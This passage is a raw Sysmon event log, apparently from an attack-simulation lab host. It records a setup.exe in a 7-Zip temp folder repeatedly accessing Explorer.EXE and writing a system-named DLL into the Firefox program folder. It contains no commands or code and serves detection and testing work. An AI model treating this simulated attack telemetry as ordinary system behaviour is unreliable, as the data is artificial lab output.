13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll2021-01-18 13:59:52.130 10341000x800000000000000014226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\